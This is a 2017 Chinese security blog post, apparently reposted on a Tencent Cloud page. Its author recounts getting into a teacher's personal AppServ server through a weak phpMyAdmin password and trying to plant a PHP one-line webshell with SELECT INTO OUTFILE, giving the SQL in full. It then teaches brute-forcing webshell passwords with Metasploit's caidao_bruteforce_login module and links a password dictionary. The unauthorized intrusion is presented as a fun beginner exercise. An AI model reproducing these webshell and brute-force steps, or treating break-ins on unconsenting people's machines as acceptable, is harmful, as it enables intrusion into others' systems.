啥?Metasploit里面也有菜刀~~~

利用msf破解一句话木马

0x01 前言

本文为智者楚轩原创文章

事情要从下午说起,同学突然叫我说,xxx,我扫到一个老师在电脑上自己搭建的服务器,上面有他c盘appserv的一些文件。还用弱口令进入了他的phpmyadmin。一听到这个我兴趣就来了。

当时我也进入了那个老师搭建的本机服务器。因为现在已经是深夜,老师早已回家,所以暂时没法找实体的图,我就从qq群里找记录给大家分享一下。这里是当时同学分享出来的老师自己电脑的服务器地址。

我随便翻了一下。有很多老师搭建的试验环境。这是当时发群里的图。

0x02 正文

这里面有很多很多试验环境,我推测是老师在本机上搭建了一个这样的环境,至于是怎么知道是老师的,是因为在phpmyadmin里面的用户看到了某老师的名字。

当时尝试了phpmyadmin里面执行sql上马,想通过sql上马需要满足两个条件,1.root权限,2.得知绝对路径。代码为

SELECT '<?php @eval('$_POST['cmd']');?>' INTO OUTFILE 'C:/AppServ/www/f.php';

但是我发现一个问题,上传php后缀直接sql报错。

然后上传txt后缀的这种可直接访

SELECT '123' INTO OUTFILE 'C:/AppServ/www/f.txt';

但是上传txt后缀的,又是一句话木马的内容的,

SELECT '<?php @eval('$_POST['cmd']');?>' INTO OUTFILE 'C:/AppServ/www/f.txt';

上传之后sql显示成功,但是访问直接404,我推测是被360杀了。因为我在本机上有时候弄个小马啥的都会被360直接隔离。

所以这条路行不通了,此时我逛到了如上图所示的织梦cms那里,想起可以上马,然后那个时候下午六点了,就和同学出去吃饭了,回来的时候老师的笔记本移动服务器已经不在了,估计老师应该回家了。现在想起来sql都不能上马被360杀这个肯定也不行。

好了现在深夜四点我也不是那种不要命的学习的那种,刚十二点就睡了,但是室友各种打dnf吵,一会就说一句话一会又说一句话深感绝望,于是起来学习。看某大佬给我的农夫安全团队的大佬录制的视频,正好看到了一个用msf破解一句话木马的密码的视频。然后想起来今天老师的服务器根目录下面有一个2.php,点开之后啥都没有,我当时推测是一个php木马。然后我用菜刀试了几个我常用的密码,发现都不对。刚刚看到了那个视频讲了一下如何使用msf破解菜刀密码。但是有一点点小的瑕疵,我就补充一丢丢。

首先我用我的电脑复现一下当时老师服务器的情况

这个是我自己的ip地址,当时老师的差不多也是这样,没关目录遍历。然后点开1.php一片空白。

此时用kali开msf,输入search caidao(ps:这个也是我刚刚看农夫安全的视频看到的,在之前从来都不知道msf竟然还有菜刀的模块,国际和中国接轨,感觉很神奇。)

然后老套路,

use auxiliary/scanner/http/caidao_bruteforce_login

还是show options一下

这个时候set rhost 目标ip

set targeturl /木马名

基本的设置就好了,但是注意看这里,他原本的字典是一个啥啥啥unix字典,总之破解率很低,我看了看字典内容,可能里面的密码偏向国外的环境。像国内的环境啊啥的和国外区别很大,比如我经常用cmd,hacker之类的做密码,晚上的时候又问了一个学弟他常用的一句话密码是多少,学弟说c,a,b之类的,那个字典里没有这些。

然后图里我是换了一个字典,这个字典也是那位大佬发给我的,里面有很多的常用webshell密码。我看了一下我和学弟常用的一句话密码都在里面。密码字典见附件。

然后

set PASS_FILE /你的路径/字典名.txt 此时run一下。

这个字典是真的强大。我换了好几个密码字典都可以成功。

本来这个文章到这里就结束了,但是我因为在看很多大佬的文章的时候很多都看不懂,因为涉及到很多专业名词都不懂,所以给一些还没入门的老哥来个我这个文章的一些新手普及,仔细看看这些知识应该能看懂这个文章。

appserv

appserv是一个服务器的集成环境,直接网上搜索下载然后搜索下载安装教程安装即可,这个是apache,php,mysql组成的,可以把你写的静态网页放在appserv的www目录下,改名为index.html(这个是默认访问,假如你访问一个网站,一般来说他默认的就是访问这个页面),然后通过localhost:端口号,127.0.0.1:端口号,ip:端口号,三种方式皆可访问到你的页面。

phpmyadmin

这个是管理mysql的工具,这个一两句话也说不清楚,如果不懂mysql的话肯定没法学安全的,如果不懂这个的话建议大家去学html和php+mysql,建议就是会mysql的基本语法,了解mysql是干啥的,了解php是如何调用mysql的,就差不多了,深入一点的话可以自己学习开发一个基本功能的cms,这些教程网上有很多,大家可以去各种论坛搜索。

msf

是metasploit,他是一个非常非常非常强大的集成渗透环境。下载kali linux,在这之前建议你学习一下linux基础,这个metasploit里面有很多很多集成的工具,非常傻瓜式,熟悉一下常用的用法可以通杀很多漏洞。

菜刀

菜刀这个东西我以前刚用的时候不知道用法就瞎搞,相信很多新手刚学的时候也有我一样的问题,就是传上去一个木马,比如我在xx.com.cn/xx/yy/upload.php这里上传了一个木马,然后我开菜刀。直接去连xx.com.cn。。。。。。。然后当时也是不懂就瞎搞,菜刀这个东西必须要找到你上传的木马的路径,就是举个例子xx.com.cn/xx/yy/zz/upload/1.php,然后你开菜刀直接把url输入进去,然后输入木马的密码,就可以了,木马的密码实际上是一个变量,大家可以试试手动搞,把POST改为GET,然后在访问木马的时候加上?你的密码="phpinfo()";学了php就知道一句话木马其实就是接收一个变量。

字典

字典一般用来暴力破解的 ,所谓暴力破解,我直接举个例子,假如你的密码是123456,然后我从000001,000002,000003,000004,000005.......123456,就可以破解出你的密码了。字典暴力破解也是同理,通过很多常见的密码去一个一个的试密码是否正确,不过这些都是由程序完成的。

突然发现字典不能传这里,我留个百度云链接吧。

链接:https://pan.baidu.com/s/1pKO3cT1 密码:q3dh

原文发布于微信公众号 - 网络安全社区悦信安(yuexin_an)

原文发表时间:2017-12-30

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏FreeBuf

某行小程序投标测试的思路和坑

先发下牢骚吧,最近看FB里面的文章,大体上往底层概念越来越多,各种挖矿木马的,还有各种难理解的概念,都没有勇气点开看看了。

841
来自专栏有趣的django

Django+xadmin打造在线教育平台(四)

代码 github下载 七、授课机构功能 7.1.模板继承 (1)创建母板 把org-list.html拷贝到templates目录下,新建base.html...

8545
来自专栏程序员的SOD蜜

用惯了ORM,居然不会写分页SQL了

    最近准备找新工作,于是下午请了假,去上地软件园一家国内大型软件外包公司去面试架构师,从国贸到面试地点,坐地铁足足走了一个半小时,终于到了前台,联系了HR...

3206
来自专栏FreeBuf

低成本安全硬件(二) | RFID on PN532

引言 鉴于硬件安全对于大多数新人是较少接触的,而这方面又非常吸引我,但是部分专业安全研究设备较高的价格使人望而却步。在该系列中,笔者希望对此感兴趣的读者在花费较...

6359
来自专栏双十二技术哥

Android性能优化(九)之被忽视的电量

移动互联网的大潮到来之后,我们都变身好男人:“用智能手机的男人都是好男人,因为晚上必须回家充电。”一句笑言,但也可以看得出来目前使用智能设备电量方面的问题。

2593
来自专栏有趣的Python和你

抖音小姐姐视频爬虫

前段时间,创造101着实火了一把,问我pick哪位小姐姐,当然是唱歌老跑调,跳舞数拍子的杨超越了。其实在看创造101之前,就已经在抖音上关注了她,今天就来爬爬她...

2172
来自专栏FreeBuf

微软:暴力破解面前,增强密码复杂性基本没用

我们都痛恨密码,然而不幸的是在当下及可以看见的未来里,账户登录等在线认证操作的主要方法还是需要使用密码的。密码认证有时确实比较烦人,尤其是一些网站为了密码安全性...

2796
来自专栏腾讯数据中心

数据中心柴油发电机组带容性负载能力的案例探讨(下)

柴油发电机组在数据中心行业的特性应用场景下,容性带载能力及突加重载能力一直是行业研究和攻克的应用难题,腾讯IDC技术专家将从测试和技术研究的角度来剖析其中的奥妙...

3184
来自专栏FreeBuf

泄露数据 | 黑客论坛Nulled.IO用户都用哪些密码?

2013年,国外老牌技术新闻和信息分享网站Ars Technica做了一个有趣的实验。他们从互联网下载了一份被黑客公布在网上的社工数据,包含16000个用户的账...

2929
来自专栏漏斗社区

专属|Spectre漏洞诞生新变体

又到了熬夜看球喝啤酒的快乐日子了!昨晚,有多少小伙们跟斗哥一样,顶着黑眼圈看完了世界杯首场比赛!

1424

扫码关注云+社区

领取腾讯云代金券